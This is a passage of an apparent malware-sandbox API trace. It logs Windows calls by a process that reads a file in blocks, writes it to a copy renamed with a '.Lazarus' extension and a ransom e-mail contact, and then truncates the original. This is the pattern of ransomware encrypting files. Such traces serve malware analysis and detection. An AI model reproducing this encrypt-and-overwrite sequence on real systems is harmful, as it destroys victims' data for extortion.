dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.885] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0073.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0073.886] GetLastError () returned 0x0 [0073.886] SetLastError (dwErrCode=0x0) [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0073.886] GetLastError () returned 0x0 [0073.886] SetLastError (dwErrCode=0x0) [0073.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69440 [0073.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0073.886] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0073.886] AreFileApisANSI () returned 1 [0073.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0073.886] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x80a30 [0073.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=100 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 100 [0073.886] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.887] GetFileType (hFile=0x410) returned 0x1 [0073.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0073.887] AreFileApisANSI () returned 1 [0073.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d738 [0073.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0073.887] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0073.887] GetFileType (hFile=0x428) returned 0x1 [0073.887] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0073.887] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.888] GetLastError () returned 0x0 [0073.888] SetLastError (dwErrCode=0x0) [0073.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.888] GetLastError () returned 0x0 [0073.888] SetLastError (dwErrCode=0x0) [0073.888] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0073.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0073.888] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0073.888] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0073.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0073.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0073.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0073.890] GetLastError () returned 0x0 [0073.890] SetLastError (dwErrCode=0x0) [0073.890] GetLastError () returned 0x0 [0073.890] SetLastError (dwErrCode=0x0) [0073.891] GetLastError () returned 0x0 [0073.891] SetLastError (dwErrCode=0x0) [0073.891] GetLastError () returned 0x0 [0073.891] SetLastError (dwErrCode=0x0) [0073.891] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.891] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.896] GetLastError () returned 0x0 [0073.896] SetLastError (dwErrCode=0x0) [0073.896] GetLastError () returned 0x0 [0073.896] SetLastError (dwErrCode=0x0) [0073.896] GetLastError () returned 0x0 [0073.896] SetLastError (dwErrCode=0x0) [0073.896] GetLastError () returned 0x0 [0073.896] SetLastError (dwErrCode=0x0) [0073.896] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.896] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.897] GetLastError () returned 0x0 [0073.897] SetLastError (dwErrCode=0x0) [0073.897] GetLastError () returned 0x0 [0073.897] SetLastError (dwErrCode=0x0) [0073.897] GetLastError () returned 0x0 [0073.897] SetLastError (dwErrCode=0x0) [0073.897] GetLastError () returned 0x0 [0073.897] SetLastError (dwErrCode=0x0) [0073.897] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.897] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.897] GetLastError () returned 0x0 [0073.897] SetLastError (dwErrCode=0x0) [0073.898] GetLastError () returned 0x0 [0073.898] SetLastError (dwErrCode=0x0) [0073.898] GetLastError () returned 0x0 [0073.898] SetLastError (dwErrCode=0x0) [0073.898] GetLastError () returned 0x0 [0073.898] SetLastError (dwErrCode=0x0) [0073.898] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.898] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.898] GetLastError () returned 0x0 [0073.898] SetLastError (dwErrCode=0x0) [0073.898] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.899] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.899] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.899] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.899] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.899] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.899] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.899] GetLastError () returned 0x0 [0073.899] SetLastError (dwErrCode=0x0) [0073.900] GetLastError () returned 0x0 [0073.900] SetLastError (dwErrCode=0x0) [0073.900] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.900] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.900] GetLastError () returned 0x0 [0073.900] SetLastError (dwErrCode=0x0) [0073.900] GetLastError () returned 0x0 [0073.900] SetLastError (dwErrCode=0x0) [0073.900] GetLastError () returned 0x0 [0073.900] SetLastError (dwErrCode=0x0) [0073.900] GetLastError () returned 0x0 [0073.900] SetLastError (dwErrCode=0x0) [0073.901] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.901] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.901] GetLastError () returned 0x0 [0073.901] SetLastError (dwErrCode=0x0) [0073.901] GetLastError () returned 0x0 [0073.901] SetLastError (dwErrCode=0x0) [0073.901] GetLastError () returned 0x0 [0073.901] SetLastError (dwErrCode=0x0) [0073.901] GetLastError () returned 0x0 [0073.901] SetLastError (dwErrCode=0x0) [0073.901] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.902] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.902] GetLastError () returned 0x0 [0073.902] SetLastError (dwErrCode=0x0) [0073.902] GetLastError () returned 0x0 [0073.902] SetLastError (dwErrCode=0x0) [0073.902] GetLastError () returned 0x0 [0073.902] SetLastError (dwErrCode=0x0) [0073.902] GetLastError () returned 0x0 [0073.902] SetLastError (dwErrCode=0x0) [0073.902] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.902] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.903] GetLastError () returned 0x0 [0073.903] SetLastError (dwErrCode=0x0) [0073.903] GetLastError () returned 0x0 [0073.903] SetLastError (dwErrCode=0x0) [0073.903] GetLastError () returned 0x0 [0073.903] SetLastError (dwErrCode=0x0) [0073.903] GetLastError () returned 0x0 [0073.903] SetLastError (dwErrCode=0x0) [0073.903] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.903] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.904] GetLastError () returned 0x0 [0073.904] SetLastError (dwErrCode=0x0) [0073.904] GetLastError () returned 0x0 [0073.904] SetLastError (dwErrCode=0x0) [0073.904] GetLastError () returned 0x0 [0073.904] SetLastError (dwErrCode=0x0) [0073.904] GetLastError () returned 0x0 [0073.904] SetLastError (dwErrCode=0x0) [0073.904] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.904] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.904] GetLastError () returned 0x0 [0073.904] SetLastError (dwErrCode=0x0) [0073.905] GetLastError () returned 0x0 [0073.905] SetLastError (dwErrCode=0x0) [0073.905] GetLastError () returned 0x0 [0073.905] SetLastError (dwErrCode=0x0) [0073.905] GetLastError () returned 0x0 [0073.905] SetLastError (dwErrCode=0x0) [0073.905] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.905] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.905] GetLastError () returned 0x0 [0073.905] SetLastError (dwErrCode=0x0) [0073.905] GetLastError () returned 0x0 [0073.905] SetLastError (dwErrCode=0x0) [0073.906] GetLastError () returned 0x0 [0073.906] SetLastError (dwErrCode=0x0) [0073.906] GetLastError () returned 0x0 [0073.906] SetLastError (dwErrCode=0x0) [0073.906] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.906] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.906] GetLastError () returned 0x0 [0073.906] SetLastError (dwErrCode=0x0) [0073.906] GetLastError () returned 0x0 [0073.906] SetLastError (dwErrCode=0x0) [0073.906] GetLastError () returned 0x0 [0073.906] SetLastError (dwErrCode=0x0) [0073.907] GetLastError () returned 0x0 [0073.907] SetLastError (dwErrCode=0x0) [0073.907] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.907] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.907] GetLastError () returned 0x0 [0073.907] SetLastError (dwErrCode=0x0) [0073.907] GetLastError () returned 0x0 [0073.907] SetLastError (dwErrCode=0x0) [0073.907] GetLastError () returned 0x0 [0073.907] SetLastError (dwErrCode=0x0) [0073.907] GetLastError () returned 0x0 [0073.907] SetLastError (dwErrCode=0x0) [0073.908] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.908] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.908] GetLastError () returned 0x0 [0073.908] SetLastError (dwErrCode=0x0) [0073.908] GetLastError () returned 0x0 [0073.908] SetLastError (dwErrCode=0x0) [0073.908] GetLastError () returned 0x0 [0073.908] SetLastError (dwErrCode=0x0) [0073.908] GetLastError () returned 0x0 [0073.908] SetLastError (dwErrCode=0x0) [0073.908] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.909] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.909] GetLastError () returned 0x0 [0073.909] SetLastError (dwErrCode=0x0) [0073.909] GetLastError () returned 0x0 [0073.909] SetLastError (dwErrCode=0x0) [0073.909] GetLastError () returned 0x0 [0073.909] SetLastError (dwErrCode=0x0) [0073.909] GetLastError () returned 0x0 [0073.909] SetLastError (dwErrCode=0x0) [0073.909] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.909] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.910] GetLastError () returned 0x0 [0073.910] SetLastError (dwErrCode=0x0) [0073.910] GetLastError () returned 0x0 [0073.910] SetLastError (dwErrCode=0x0) [0073.910] GetLastError () returned 0x0 [0073.910] SetLastError (dwErrCode=0x0) [0073.910] GetLastError () returned 0x0 [0073.910] SetLastError (dwErrCode=0x0) [0073.910] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.910] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] GetLastError () returned 0x0 [0073.911] SetLastError (dwErrCode=0x0) [0073.911] GetLastError () returned 0x0 [0073.911] SetLastError (dwErrCode=0x0) [0073.911] GetLastError () returned 0x0 [0073.911] SetLastError (dwErrCode=0x0) [0073.911] GetLastError () returned 0x0 [0073.911] SetLastError (dwErrCode=0x0) [0073.911] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.911] GetLastError () returned 0x0 [0073.911] SetLastError (dwErrCode=0x0) [0073.911] GetLastError () returned 0x0 [0073.912] SetLastError (dwErrCode=0x0) [0073.912] GetLastError () returned 0x0 [0073.912] SetLastError (dwErrCode=0x0) [0073.912] GetLastError () returned 0x0 [0073.912] SetLastError (dwErrCode=0x0) [0073.912] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0073.912] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.912] GetLastError () returned 0x0 [0073.912] SetLastError (dwErrCode=0x0) [0073.912] GetLastError () returned 0x0 [0073.912] SetLastError (dwErrCode=0x0) [0073.912] GetLastError () returned 0x0 [0073.913] SetLastError (dwErrCode=0x0) [0073.913] GetLastError () returned 0x0 [0073.913] SetLastError (dwErrCode=0x0) [0073.913] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x9d5, lpOverlapped=0x0) returned 1 [0073.913] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0073.913] GetLastError () returned 0x0 [0073.913] SetLastError (dwErrCode=0x0) [0073.913] GetLastError () returned 0x0 [0073.913] SetLastError (dwErrCode=0x0) [0073.913] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0073.913] GetLastError () returned 0x0 [0073.913] SetLastError (dwErrCode=0x0) [0073.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5) returned 0x7cf20 [0073.914] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0073.914] GetLastError () returned 0x0 [0074.061] SetLastError (dwErrCode=0x0) [0074.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0074.101] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x9e0, lpOverlapped=0x0) returned 1 [0074.102] GetLastError () returned 0x0 [0074.102] SetLastError (dwErrCode=0x0) [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0074.102] GetLastError () returned 0x0 [0074.102] SetLastError (dwErrCode=0x0) [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0074.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0074.102] CloseHandle (hObject=0x410) returned 1 [0074.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0074.105] CloseHandle (hObject=0x428) returned 1 [0074.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0074.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0074.106] AreFileApisANSI () returned 1 [0074.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0074.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cfa8 [0074.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x6cfa8, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0074.106] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0074.107] GetFileType 